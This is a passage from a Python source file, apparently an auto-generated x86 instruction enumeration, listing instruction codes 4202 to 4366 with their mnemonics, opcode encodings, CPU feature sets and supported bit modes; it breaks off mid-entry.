D3NOW_PAVGUSB_MM_MMM64: int = 4202
"""
``PAVGUSB mm, mm/m64``
``0F 0F /r BF``
``3DNOW``
``16/32/64-bit``
"""
RMPADJUST: int = 4203
"""
``RMPADJUST``
``F3 0F 01 FE``
``SEV-SNP``
``64-bit``
"""
RMPUPDATE: int = 4204
"""
``RMPUPDATE``
``F2 0F 01 FE``
``SEV-SNP``
``64-bit``
"""
PSMASH: int = 4205
"""
``PSMASH``
``F3 0F 01 FF``
``SEV-SNP``
``64-bit``
"""
PVALIDATEW: int = 4206
"""
``PVALIDATE``
``a16 F2 0F 01 FF``
``SEV-SNP``
``16/32-bit``
"""
PVALIDATED: int = 4207
"""
``PVALIDATE``
``a32 F2 0F 01 FF``
``SEV-SNP``
``16/32/64-bit``
"""
PVALIDATEQ: int = 4208
"""
``PVALIDATE``
``a64 F2 0F 01 FF``
``SEV-SNP``
``64-bit``
"""
SERIALIZE: int = 4209
"""
``SERIALIZE``
``NP 0F 01 E8``
``SERIALIZE``
``16/32/64-bit``
"""
XSUSLDTRK: int = 4210
"""
``XSUSLDTRK``
``F2 0F 01 E8``
``TSXLDTRK``
``16/32/64-bit``
"""
XRESLDTRK: int = 4211
"""
``XRESLDTRK``
``F2 0F 01 E9``
``TSXLDTRK``
``16/32/64-bit``
"""
INVLPGBW: int = 4212
"""
``INVLPGB``
``a16 NP 0F 01 FE``
``INVLPGB``
``16/32-bit``
"""
INVLPGBD: int = 4213
"""
``INVLPGB``
``a32 NP 0F 01 FE``
``INVLPGB``
``16/32/64-bit``
"""
INVLPGBQ: int = 4214
"""
``INVLPGB``
``a64 NP 0F 01 FE``
``INVLPGB``
``64-bit``
"""
TLBSYNC: int = 4215
"""
``TLBSYNC``
``NP 0F 01 FF``
``INVLPGB``
``16/32/64-bit``
"""
PREFETCHRESERVED3_M8: int = 4216
"""
``PREFETCHW m8``
``0F 0D /3``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED4_M8: int = 4217
"""
``PREFETCH m8``
``0F 0D /4``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED5_M8: int = 4218
"""
``PREFETCH m8``
``0F 0D /5``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED6_M8: int = 4219
"""
``PREFETCH m8``
``0F 0D /6``
``PREFETCHW``
``16/32/64-bit``
"""
PREFETCHRESERVED7_M8: int = 4220
"""
``PREFETCH m8``
``0F 0D /7``
``PREFETCHW``
``16/32/64-bit``
"""
UD0: int = 4221
"""
``UD0``
``0F FF``
``286+``
``16/32/64-bit``
"""
VMGEXIT: int = 4222
"""
``VMGEXIT``
``F3 0F 01 D9``
``SEV-ES``
``16/32/64-bit``
"""
GETSECQ: int = 4223
"""
``GETSECQ``
``NP o64 0F 37``
``SMX``
``64-bit``
"""
VEX_LDTILECFG_M512: int = 4224
"""
``LDTILECFG m512``
``VEX.128.0F38.W0 49 !(11):000:bbb``
``AMX-TILE``
``64-bit``
"""
VEX_TILERELEASE: int = 4225
"""
``TILERELEASE``
``VEX.128.0F38.W0 49 C0``
``AMX-TILE``
``64-bit``
"""
VEX_STTILECFG_M512: int = 4226
"""
``STTILECFG m512``
``VEX.128.66.0F38.W0 49 !(11):000:bbb``
``AMX-TILE``
``64-bit``
"""
VEX_TILEZERO_TMM: int = 4227
"""
``TILEZERO tmm1``
``VEX.128.F2.0F38.W0 49 11:rrr:000``
``AMX-TILE``
``64-bit``
"""
VEX_TILELOADDT1_TMM_SIBMEM: int = 4228
"""
``TILELOADDT1 tmm1, sibmem``
``VEX.128.66.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TILESTORED_SIBMEM_TMM: int = 4229
"""
``TILESTORED sibmem, tmm1``
``VEX.128.F3.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TILELOADD_TMM_SIBMEM: int = 4230
"""
``TILELOADD tmm1, sibmem``
``VEX.128.F2.0F38.W0 4B !(11):rrr:100``
``AMX-TILE``
``64-bit``
"""
VEX_TDPBF16PS_TMM_TMM_TMM: int = 4231
"""
``TDPBF16PS tmm1, tmm2, tmm3``
``VEX.128.F3.0F38.W0 5C 11:rrr:bbb``
``AMX-BF16``
``64-bit``
"""
VEX_TDPBUUD_TMM_TMM_TMM: int = 4232
"""
``TDPBUUD tmm1, tmm2, tmm3``
``VEX.128.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBUSD_TMM_TMM_TMM: int = 4233
"""
``TDPBUSD tmm1, tmm2, tmm3``
``VEX.128.66.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBSUD_TMM_TMM_TMM: int = 4234
"""
``TDPBSUD tmm1, tmm2, tmm3``
``VEX.128.F3.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
VEX_TDPBSSD_TMM_TMM_TMM: int = 4235
"""
``TDPBSSD tmm1, tmm2, tmm3``
``VEX.128.F2.0F38.W0 5E 11:rrr:bbb``
``AMX-INT8``
``64-bit``
"""
FNSTDW_AX: int = 4236
"""
``FNSTDW AX``
``DF E1``
``387 SL``
``16/32-bit``
"""
FNSTSG_AX: int = 4237
"""
``FNSTSG AX``
``DF E2``
``387 SL``
``16/32-bit``
"""
RDSHR_RM32: int = 4238
"""
``RDSHR r/m32``
``0F 36 /0``
``Cyrix 6x86MX, M II, III``
``16/32-bit``
"""
WRSHR_RM32: int = 4239
"""
``WRSHR r/m32``
``0F 37 /0``
``Cyrix 6x86MX, M II, III``
``16/32-bit``
"""
SMINT: int = 4240
"""
``SMINT``
``0F 38``
``Cyrix 6x86MX+, AMD Geode GX/LX``
``16/32-bit``
"""
DMINT: int = 4241
"""
``DMINT``
``0F 39``
``AMD Geode GX/LX``
``16/32-bit``
"""
RDM: int = 4242
"""
``RDM``
``0F 3A``
``AMD Geode GX/LX``
``16/32-bit``
"""
SVDC_M80_SREG: int = 4243
"""
``SVDC m80, Sreg``
``0F 78 /r``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSDC_SREG_M80: int = 4244
"""
``RSDC Sreg, m80``
``0F 79 /r``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SVLDT_M80: int = 4245
"""
``SVLDT m80``
``0F 7A /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSLDT_M80: int = 4246
"""
``RSLDT m80``
``0F 7B /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SVTS_M80: int = 4247
"""
``SVTS m80``
``0F 7C /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
RSTS_M80: int = 4248
"""
``RSTS m80``
``0F 7D /0``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
SMINT_0F7E: int = 4249
"""
``SMINT``
``0F 7E``
``Cyrix 6x86 or earlier``
``16/32-bit``
"""
BB0_RESET: int = 4250
"""
``BB0_RESET``
``0F 3A``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
BB1_RESET: int = 4251
"""
``BB1_RESET``
``0F 3B``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
CPU_WRITE: int = 4252
"""
``CPU_WRITE``
``0F 3C``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
CPU_READ: int = 4253
"""
``CPU_READ``
``0F 3D``
``Cyrix MediaGX, GXm, GXLV, GX1``
``16/32-bit``
"""
ALTINST: int = 4254
"""
``ALTINST``
``0F 3F``
``Centaur AIS``
``16/32-bit``
"""
PAVEB_MM_MMM64: int = 4255
"""
``PAVEB mm, mm/m64``
``0F 50 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PADDSIW_MM_MMM64: int = 4256
"""
``PADDSIW mm, mm/m64``
``0F 51 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMAGW_MM_MMM64: int = 4257
"""
``PMAGW mm, mm/m64``
``0F 52 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PDISTIB_MM_M64: int = 4258
"""
``PDISTIB mm, m64``
``0F 54 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PSUBSIW_MM_MMM64: int = 4259
"""
``PSUBSIW mm, mm/m64``
``0F 55 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVZB_MM_M64: int = 4260
"""
``PMVZB mm, m64``
``0F 58 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMULHRW_MM_MMM64: int = 4261
"""
``PMULHRW mm, mm/m64``
``0F 59 /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVNZB_MM_M64: int = 4262
"""
``PMVNZB mm, m64``
``0F 5A /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVLZB_MM_M64: int = 4263
"""
``PMVLZB mm, m64``
``0F 5B /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMVGEZB_MM_M64: int = 4264
"""
``PMVGEZB mm, m64``
``0F 5C /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMULHRIW_MM_MMM64: int = 4265
"""
``PMULHRIW mm, mm/m64``
``0F 5D /r``
``CYRIX_EMMI``
``16/32-bit``
"""
PMACHRIW_MM_M64: int = 4266
"""
``PMACHRIW mm, m64``
``0F 5E /r``
``CYRIX_EMMI``
``16/32-bit``
"""
CYRIX_D9D7: int = 4267
"""
``UNDOC``
``D9 D7``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_D9E2: int = 4268
"""
``UNDOC``
``D9 E2``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FTSTP: int = 4269
"""
``FTSTP``
``D9 E6``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_D9E7: int = 4270
"""
``UNDOC``
``D9 E7``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRINT2: int = 4271
"""
``FRINT2``
``DB FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRICHOP: int = 4272
"""
``FRICHOP``
``DD FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DED8: int = 4273
"""
``UNDOC``
``DE D8``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDA: int = 4274
"""
``UNDOC``
``DE DA``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDC: int = 4275
"""
``UNDOC``
``DE DC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDD: int = 4276
"""
``UNDOC``
``DE DD``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
CYRIX_DEDE: int = 4277
"""
``UNDOC``
``DE DE``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
FRINEAR: int = 4278
"""
``FRINEAR``
``DF FC``
``Cyrix, AMD Geode GX/LX``
``16/32-bit``
"""
TDCALL: int = 4279
"""
``TDCALL``
``66 0F 01 CC``
``TDX``
``16/32/64-bit``
"""
SEAMRET: int = 4280
"""
``SEAMRET``
``66 0F 01 CD``
``TDX``
``64-bit``
"""
SEAMOPS: int = 4281
"""
``SEAMOPS``
``66 0F 01 CE``
``TDX``
``64-bit``
"""
SEAMCALL: int = 4282
"""
``SEAMCALL``
``66 0F 01 CF``
``TDX``
``64-bit``
"""
AESENCWIDE128KL_M384: int = 4283
"""
``AESENCWIDE128KL m384, <XMM0-7>``
``F3 0F 38 D8 !(11):000:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESDECWIDE128KL_M384: int = 4284
"""
``AESDECWIDE128KL m384, <XMM0-7>``
``F3 0F 38 D8 !(11):001:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESENCWIDE256KL_M512: int = 4285
"""
``AESENCWIDE256KL m512, <XMM0-7>``
``F3 0F 38 D8 !(11):010:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
AESDECWIDE256KL_M512: int = 4286
"""
``AESDECWIDE256KL m512, <XMM0-7>``
``F3 0F 38 D8 !(11):011:bbb``
``AESKLE and WIDE_KL``
``16/32/64-bit``
"""
LOADIWKEY_XMM_XMM: int = 4287
"""
``LOADIWKEY xmm1, xmm2, <EAX>, <XMM0>``
``F3 0F 38 DC 11:rrr:bbb``
``KL``
``16/32/64-bit``
"""
AESENC128KL_XMM_M384: int = 4288
"""
``AESENC128KL xmm, m384``
``F3 0F 38 DC !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESDEC128KL_XMM_M384: int = 4289
"""
``AESDEC128KL xmm, m384``
``F3 0F 38 DD !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESENC256KL_XMM_M512: int = 4290
"""
``AESENC256KL xmm, m512``
``F3 0F 38 DE !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
AESDEC256KL_XMM_M512: int = 4291
"""
``AESDEC256KL xmm, m512``
``F3 0F 38 DF !(11):rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
ENCODEKEY128_R32_R32: int = 4292
"""
``ENCODEKEY128 r32, r32, <XMM0-2>, <XMM4-6>``
``F3 0F 38 FA 11:rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
ENCODEKEY256_R32_R32: int = 4293
"""
``ENCODEKEY256 r32, r32, <XMM0-6>``
``F3 0F 38 FB 11:rrr:bbb``
``AESKLE``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_XMM_XMM: int = 4294
"""
``VBROADCASTSS xmm1, xmm2``
``VEX.128.66.0F38.W0 18 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_YMM_XMM: int = 4295
"""
``VBROADCASTSS ymm1, xmm2``
``VEX.256.66.0F38.W0 18 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VBROADCASTSD_YMM_XMM: int = 4296
"""
``VBROADCASTSD ymm1, xmm2``
``VEX.256.66.0F38.W0 19 /r``
``AVX2``
``16/32/64-bit``
"""
VMGEXIT_F2: int = 4297
"""
``VMGEXIT``
``F2 0F 01 D9``
``SEV-ES``
``16/32/64-bit``
"""
UIRET: int = 4298
"""
``UIRET``
``F3 0F 01 EC``
``UINTR``
``64-bit``
"""
TESTUI: int = 4299
"""
``TESTUI``
``F3 0F 01 ED``
``UINTR``
``64-bit``
"""
CLUI: int = 4300
"""
``CLUI``
``F3 0F 01 EE``
``UINTR``
``64-bit``
"""
STUI: int = 4301
"""
``STUI``
``F3 0F 01 EF``
``UINTR``
``64-bit``
"""
SENDUIPI_R64: int = 4302
"""
``SENDUIPI r64``
``F3 0F C7 /6``
``UINTR``
``64-bit``
"""
HRESET_IMM8: int = 4303
"""
``HRESET imm8, <EAX>``
``F3 0F 3A F0 C0 ib``
``HRESET``
``16/32/64-bit``
"""
VEX_VPDPBUSD_XMM_XMM_XMMM128: int = 4304
"""
``VPDPBUSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 50 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSD_YMM_YMM_YMMM256: int = 4305
"""
``VPDPBUSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 50 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSDS_XMM_XMM_XMMM128: int = 4306
"""
``VPDPBUSDS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 51 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPBUSDS_YMM_YMM_YMMM256: int = 4307
"""
``VPDPBUSDS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 51 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSD_XMM_XMM_XMMM128: int = 4308
"""
``VPDPWSSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 52 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSD_YMM_YMM_YMMM256: int = 4309
"""
``VPDPWSSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 52 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSDS_XMM_XMM_XMMM128: int = 4310
"""
``VPDPWSSDS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 53 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
VEX_VPDPWSSDS_YMM_YMM_YMMM256: int = 4311
"""
``VPDPWSSDS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 53 /r``
``AVX-VNNI``
``16/32/64-bit``
"""
CCS_HASH_16: int = 4312
"""
``CCS_HASH``
``a16 F3 0F A6 E8``
``PADLOCK_GMI``
``16/32-bit``
"""
CCS_HASH_32: int = 4313
"""
``CCS_HASH``
``a32 F3 0F A6 E8``
``PADLOCK_GMI``
``16/32/64-bit``
"""
CCS_HASH_64: int = 4314
"""
``CCS_HASH``
``a64 F3 0F A6 E8``
``PADLOCK_GMI``
``64-bit``
"""
CCS_ENCRYPT_16: int = 4315
"""
``CCS_ENCRYPT``
``a16 F3 0F A7 F0``
``PADLOCK_GMI``
``16/32-bit``
"""
CCS_ENCRYPT_32: int = 4316
"""
``CCS_ENCRYPT``
``a32 F3 0F A7 F0``
``PADLOCK_GMI``
``16/32/64-bit``
"""
CCS_ENCRYPT_64: int = 4317
"""
``CCS_ENCRYPT``
``a64 F3 0F A7 F0``
``PADLOCK_GMI``
``64-bit``
"""
LKGS_RM16: int = 4318
"""
``LKGS r/m16``
``o16 F2 0F 00 /6``
``LKGS``
``64-bit``
"""
LKGS_R32M16: int = 4319
"""
``LKGS r32/m16``
``o32 F2 0F 00 /6``
``LKGS``
``64-bit``
"""
LKGS_R64M16: int = 4320
"""
``LKGS r64/m16``
``F2 o64 0F 00 /6``
``LKGS``
``64-bit``
"""
ERETU: int = 4321
"""
``ERETU``
``F3 0F 01 CA``
``FRED``
``64-bit``
"""
ERETS: int = 4322
"""
``ERETS``
``F2 0F 01 CA``
``FRED``
``64-bit``
"""
EVEX_VADDPH_XMM_K1Z_XMM_XMMM128B16: int = 4323
"""
``VADDPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 58 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDPH_YMM_K1Z_YMM_YMMM256B16: int = 4324
"""
``VADDPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 58 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4325
"""
``VADDPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 58 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VADDSH_XMM_K1Z_XMM_XMMM16_ER: int = 4326
"""
``VADDSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 58 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_XMM_XMMM128B16_IMM8: int = 4327
"""
``VCMPPH k1 {k2}, xmm2, xmm3/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 C2 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_YMM_YMMM256B16_IMM8: int = 4328
"""
``VCMPPH k1 {k2}, ymm2, ymm3/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 C2 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPPH_KR_K1_ZMM_ZMMM512B16_IMM8_SAE: int = 4329
"""
``VCMPPH k1 {k2}, zmm2, zmm3/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 C2 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCMPSH_KR_K1_XMM_XMMM16_IMM8_SAE: int = 4330
"""
``VCMPSH k1 {k2}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.F3.0F3A.W0 C2 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCOMISH_XMM_XMMM16_SAE: int = 4331
"""
``VCOMISH xmm1, xmm2/m16{sae}``
``EVEX.LIG.MAP5.W0 2F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_XMM_K1Z_XMMM128B32: int = 4332
"""
``VCVTDQ2PH xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_XMM_K1Z_YMMM256B32: int = 4333
"""
``VCVTDQ2PH xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4334
"""
``VCVTDQ2PH ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_XMMM128B64: int = 4335
"""
``VCVTPD2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.MAP5.W1 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_YMMM256B64: int = 4336
"""
``VCVTPD2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.MAP5.W1 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPD2PH_XMM_K1Z_ZMMM512B64_ER: int = 4337
"""
``VCVTPD2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.MAP5.W1 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_XMM_K1Z_XMMM64B16: int = 4338
"""
``VCVTPH2DQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.66.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_YMM_K1Z_XMMM128B16: int = 4339
"""
``VCVTPH2DQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.66.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2DQ_ZMM_K1Z_YMMM256B16_ER: int = 4340
"""
``VCVTPH2DQ zmm1 {k1}{z}, ymm2/m256/m16bcst{er}``
``EVEX.512.66.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_XMM_K1Z_XMMM32B16: int = 4341
"""
``VCVTPH2PD xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.MAP5.W0 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_YMM_K1Z_XMMM64B16: int = 4342
"""
``VCVTPH2PD ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.MAP5.W0 5A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PD_ZMM_K1Z_XMMM128B16_SAE: int = 4343
"""
``VCVTPH2PD zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.MAP5.W0 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_XMM_K1Z_XMMM64B16: int = 4344
"""
``VCVTPH2PSX xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.66.MAP6.W0 13 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_YMM_K1Z_XMMM128B16: int = 4345
"""
``VCVTPH2PSX ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.66.MAP6.W0 13 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2PSX_ZMM_K1Z_YMMM256B16_SAE: int = 4346
"""
``VCVTPH2PSX zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.66.MAP6.W0 13 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_XMM_K1Z_XMMM32B16: int = 4347
"""
``VCVTPH2QQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 7B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_YMM_K1Z_XMMM64B16: int = 4348
"""
``VCVTPH2QQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 7B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2QQ_ZMM_K1Z_XMMM128B16_ER: int = 4349
"""
``VCVTPH2QQ zmm1 {k1}{z}, xmm2/m128/m16bcst{er}``
``EVEX.512.66.MAP5.W0 7B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4350
"""
``VCVTPH2UDQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4351
"""
``VCVTPH2UDQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UDQ_ZMM_K1Z_YMMM256B16_ER: int = 4352
"""
``VCVTPH2UDQ zmm1 {k1}{z}, ymm2/m256/m16bcst{er}``
``EVEX.512.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4353
"""
``VCVTPH2UQQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4354
"""
``VCVTPH2UQQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 79 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UQQ_ZMM_K1Z_XMMM128B16_ER: int = 4355
"""
``VCVTPH2UQQ zmm1 {k1}{z}, xmm2/m128/m16bcst{er}``
``EVEX.512.66.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_XMM_K1Z_XMMM128B16: int = 4356
"""
``VCVTPH2UW xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_YMM_K1Z_YMMM256B16: int = 4357
"""
``VCVTPH2UW ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2UW_ZMM_K1Z_ZMMM512B16_ER: int = 4358
"""
``VCVTPH2UW zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_XMM_K1Z_XMMM128B16: int = 4359
"""
``VCVTPH2W xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_YMM_K1Z_YMMM256B16: int = 4360
"""
``VCVTPH2W ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPH2W_ZMM_K1Z_ZMMM512B16_ER: int = 4361
"""
``VCVTPH2W zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.66.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_XMM_K1Z_XMMM128B32: int = 4362
"""
``VCVTPS2PHX xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.MAP5.W0 1D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_XMM_K1Z_YMMM256B32: int = 4363
"""
``VCVTPS2PHX xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.MAP5.W0 1D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTPS2PHX_YMM_K1Z_ZMMM512B32_ER: int = 4364
"""
``VCVTPS2PHX ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.66.MAP5.W0 1D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_XMMM128B64: int = 4365
"""
``VCVTQQ2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.MAP5.W1 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_YMMM256B64: int = 4366
"""
